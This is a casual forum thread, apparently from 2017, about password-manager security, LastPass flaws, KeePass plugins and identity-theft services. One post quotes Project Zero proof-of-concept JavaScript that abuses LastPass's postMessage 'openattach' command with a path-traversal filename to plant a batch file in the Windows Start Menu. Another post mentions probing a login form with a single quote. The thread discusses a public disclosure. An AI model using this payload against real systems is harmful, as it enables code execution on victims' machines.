Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.

• Locked thread
flakeloaf
Feb 26, 2003

Still better than android clock

https://twitter.com/taviso/status/843280970430078977

don't drink the pee

Adbot
ADBOT LOVES YOU

Lain Iwakura
Aug 5, 2004

The body exists only to verify one's own existence.

Taco Defender

I love Tavis.

ate shit on live tv
Feb 15, 2004

by Azathoth

Sure don't use lastpass if you want. But since you should use a password manager, just don't use auto-fill, or auto-sync on any of them.

Truga
May 4, 2014
Lipstick Apathy
or you could use a pwm that isn't broken, but what do i know

ate shit on live tv
Feb 15, 2004

by Azathoth

Truga posted:

or you could use a pwm that isn't broken, but what do i know

Oh Word? You know that %piece of software% isn't broken? drat make sure to link your Computer Science Thesis itt, thanks.

flakeloaf
Feb 26, 2003

wait what's wrong with auto-sync now, that's my whole reason for wanting 1password so i can just change my passwords once and have all four or five or whatever the hell i'm up to machines go 'yup ok'

if dropbox gets owned i'm hosed anyway so hail eris or satan or whatever

ate shit on live tv
Feb 15, 2004

by Azathoth

flakeloaf posted:

wait what's wrong with auto-sync now, that's my whole reason for wanting 1password so i can just change my passwords once and have all four or five or whatever the hell i'm up to machines go 'yup ok'

if dropbox gets owned i'm hosed anyway so hail eris or satan or whatever

Eh, that's just my opinion about limiting risk. If your password vault exists in only one place and you just c+p from it, then all the web-hook vulnerabilities don't matter. If dropbox get's owned, then yea I agree it's basically the same as a sync-service getting owned. Eitherway, I still think it's prudent not to enable web-site integration with any password manager.

Rocko Bonaparte
Mar 12, 2002

Every day is Friday!
I have some general custodial poo poo to do that I have been putting off, but my coworker was asking about services to manage identity theft because somebody started using his identity from a breach two years ago. So I hoped y'all can answer some questions that go all over the place while I go down my list here:

1. Are there any services this guy can get to help mitigate the damage of this identity theft? It's apparently using some stale information that should be easy to notice. He particularly wants to know a good service that goes beyond credit monitoring and into checking the dark web for him to see if his poo poo's for sale.
2. I have diversified my passwords but now have a text file with a poo poo ton of passwords. I want to vault it somehow. I pretty much only ever use my passwords on my home PC and my work laptop. I was thinking of just using a USB thumb key, encrypting a password file on there, and maybe having an application to work with that file. For my little world, would this generally suffice? I understand walking that key back and forth may be a risk, but I generally intend to keep the files on both machines and just synchronize them. Heck, maybe I don't even need the USB key and could just do that over the network. I generally don't even try to log into poo poo from my phone if I can help it.
3. Is there anything I should worry about when using cookies for a client-side web application? I am trying to save the user's session using a cookie, and I want to be a big boy and not make it a place that stashes their user credentials in an easy-to-read way externally.

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum
this owns https://twitter.com/heroku/status/844213289097859072

fisting by many
Dec 25, 2009

keepass solves #2

you can set up a vault file/key file combination if you're worried about dropping your thumbstick and having your passwords stolen or w/e

MononcQc
May 29, 2007

aww yiss they finally shipped it :allears:

30 TO 50 FERAL HOG
Mar 2, 2005

just use icloud keychain

Meat Beat Agent
Aug 5, 2007

felonious assault with a sproinging boner
https://twitter.com/kyletorpey/status/844243876231680001

/r/mycrimes

Wiggly Wayne DDS
Sep 11, 2010

lastpass vuln is up: https://bugs.chromium.org/p/project-zero/issues/detail?id=1209#c5

quote:

win = window.open("https://1min-ui-prod.service.lastpass.com/");
win.postMessage({fromExtension: false, cmd: "openattach", attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec", data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==", mimetype: "other:./../../../../../Start Menu/Programs/exploit.bat"}, "*");

quote:

LastPass responded and said they have NXDOMAIN'd 1min-ui-prod.service.lastpass.com while they investigate.

They also said they couldn't get my exploit to work, but I checked my apache access logs and they were using a Mac. Naturally, calc.exe will not appear on a Mac.

quote:

I've uploaded the exploit here:

https://lock.cmpxchg8b.com/SaiGhij5/lastpass.html

BangersInMyKnickers
Nov 3, 2004

I have a thing for courageous dongles

lmbo

flakeloaf
Feb 26, 2003

quote:

They also said they couldn't get my exploit to work, but I checked my apache access logs and they were using a Mac. Naturally, calc.exe will not appear on a Mac.

this to me seems scarier than the secfuck tbh

Midjack
Dec 24, 2007

lol at whoever was checking the vuln not even looking at it to see what it did before blindly running it in a mac

lastpissssssssssss

apseudonym
Feb 25, 2011

cinci zoo sniper
Mar 15, 2013

Lain Iwakura
Aug 5, 2004

Taco Defender

Kuvo
Oct 27, 2008

Blame it on the misfortune of your bark!
Fun Shoe

quote:

lol

Maximum Leader
Dec 5, 2014
some darknet dealer just got caught with a mycrimes.xlsx

Doom Mathematic
Sep 2, 2008
If you've got the vulnerability there, why not just port calc.exe to Mac and then inject and run it?

apseudonym
Feb 25, 2011

Doom Mathematic posted:

If you've got the vulnerability there, why not just port calc.exe to Mac and then inject and run it?

What

cinci zoo sniper
Mar 15, 2013

Doom Mathematic posted:

tbf these lastpass folks seem to be inept enough, at the first glance, as if tavis almost has to do something like

if userag == mac do this else that

Wiggly Wayne DDS
Sep 11, 2010

Doom Mathematic posted:

it's a proof of concept, a rushed example to show that it works and not a universal perfect exploit designed to send os-specific payloads

lol at their blistering incompetence on not even matching operating systems when checking if the vulnerability existed, furthermore

https://twitter.com/joernchen/status/844255882707910656

James Baud
May 24, 2015

by LITERALLY AN ADMIN

Doom Mathematic posted:

Running a familiar harmless binary already on the target computer is totally different than injecting arbitrary code that "looks" like it's harmless.

See every game crack ever.

cinci zoo sniper
Mar 15, 2013

Wiggly Wayne DDS posted:

it's a proof of concept, a rushed example to show that it works and not a universal perfect exploit designed to send os-specific payloads

lol at their blistering incompetence on not even matching operating systems when checking if the vulnerability existed, furthermore

https://twitter.com/joernchen/status/844255882707910656

whats wrong in cert tho, unless they are not ovned by logmein

Wiggly Wayne DDS
Sep 11, 2010

cinci zoo sniper posted:

whats wrong in cert tho, unless they are not ovned by logmein
it's not a wildcard cert so doesn't cover the subdomain

cinci zoo sniper
Mar 15, 2013

Wiggly Wayne DDS posted:

it's not a wildcard cert so doesn't cover the subdomain
:doh: me dumb

Doom Mathematic
Sep 2, 2008
Cripes, folks, I was being facetious. I just think it would be funny if an exploit launched Windows calc.exe on a Mac.

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Doom Mathematic posted:

Cripes, folks, I was being facetious. I just think it would be funny if an exploit launched Windows calc.exe on a Mac.
when someone comes into this thread typing in proper capitalization and asks a stupid question it is incredibly likely they are being genuine

Meat Beat Agent
Aug 5, 2007

felonious assault with a sproinging boner
https://twitter.com/kyletorpey/status/844243876231680001

/r/mycrimes

spankmeister
Jun 15, 2008

Only registered members can see post attachments!

Raere
Dec 13, 2007

I don't understand why password managers are so bad. Shouldn't they be relatively straightforward to make with some competent security people on your team? I understand that antivirus software is pretty complex so there are secfucks abound, but password managers shouldn't be that complex.

burning swine
May 26, 2004

Raere posted:

I don't understand why password managers are so bad. Shouldn't they be relatively straightforward to make with some competent security people on your team? I understand that antivirus software is pretty complex so there are secfucks abound, but password managers shouldn't be that complex.

the problems are almost always related to browser integration.

keepass doesn't have browser integration, and as far as I'm aware, their only fuckup thus far was checking for updates over http (which was fixed after some whining by the author)

e:
1pass has a pretty clean record so far as well, right? lastpass is the only one getting flagged for stupid poo poo like this on a weekly basis

burning swine fucked around with this message at 21:21 on Mar 21, 2017

Lain Iwakura
Aug 5, 2004

Taco Defender
https://www.reddit.com/r/programming/comments/60jc69/company_with_an_httpserved_login_form_filed_a/df7vnzp/

quote:

So. Believe it or not, his number is on the website. I just called him. He was quick to answer too.

Twice, actually. Pretty surreal the first time (cannot believe the confidence some people have). All of this is from a VOIP number that shows up as "Private" so he won't be calling back or anything (for better or worse, it would probably be funny/cool). I'll type out my transcript and reply to first comment to get visibility:

Him: "Hello?"

"Hey, I'm looking for a user by the name of dgeorge?"

Him: "I'm dev George."

"When the entire internet browser ecosystem warns you that your website is insecure, why didn't you listen?"

Him: "The website isn't insecure, it's very secure."

"It's not. An entire professional community is talking right now about how it's not secure."

Him: "No it's not, the website is fine."

"I'm trying to share facts with you right now."

*hangs up*

Second call:

Him: "Hello?"

"Try to log into your website. I'll wait."

Him: "Who is this?"

"That really can't be your first priority right now, please. I'm trying to help you. Not everyone out there is. Log into your own website, it'll take just a moment and you'll see. It's all you have to do to catch up and sooner deal with being sued, being yelled at by any customers you might have, etc. Be an adult, you have to save your own rear end right now."

Him: *pauses* "Okay..." *groans*

Him: "It says server error."

"Yeah and it's probably going to get worse than that. Here's the deal. I woke up today and the places I read from and the people I talk to were all discussing your website and that it's completely broken and what has happened is people found your mozilla bug report; your database table with your users and passwords has been destroyed. I can't explain too much of how or why because this is something people go to school to learn about but essentially, and I say this as a professional, your website is anything but secure. You're in a good spot all things considered because this way, the info for these accounts cannot be shared any longer. You're lucky to have your entire database destroyed. The rumor is, and I haven't verified this part, that you have credit information that is easy to retrieve as well?"

Him: "No, that's not true, we have all of it sent to a secure separate location." (Probably thinking of his payment processor/third party.)

"Okay, so that is good news but I will add, not sure if you're familiar with what SSL is but it says on your website that you use it. You do not. It would be very easy for someone, even with limited experience, to intercept a transaction and the card information if you were ever unlucky enough for someone to have noticed your site's vulnerabilities before today."

Him: "Okay."

"Okay so don't worry about me, or who I am. Just search your own information and username on Google, I wish I could link you but obviously we're over the phone. Search your own information and you will see the articles talking about your site. Alternatively, type a single quotation into your login field and you will see it's broken. I can't do much because like you, I have a job and a life to deal with but best of luck and hope it goes smoothly from here on out."

Him: "Thanks, okay."

ate shit on live tv
Feb 15, 2004

by Azathoth

Doom Mathematic posted:

why not just call /Applications/Calculator.app

Shame Boy
Mar 2, 2010

COACHS SPORT BAR posted:

keepass doesn't have browser integration, and as far as I'm aware, their only fuckup thus far was checking for updates over http (which was fixed after some whining by the author)

e:
1pass has a pretty clean record so far as well, right? lastpass is the only one getting flagged for stupid poo poo like this on a weekly basis

keepass has browser integration if you use a plugin and i use the plugin and it seems to not be terrible about it :shrug:

like you can disable autofill and it will only, specifically fill username/password and you can direct it to only fill one or the other and not both automatically and it tells you what it's doing and idk it seems fine and i don't want tavis telling me how bad it's actually implemented :ohdear:

Adbot
ADBOT LOVES YOU

cinci zoo sniper
Mar 15, 2013

COACHS SPORT BAR posted:

e:
keepass has browser integration, but its shipped as 3rd party plugin or something

• Locked thread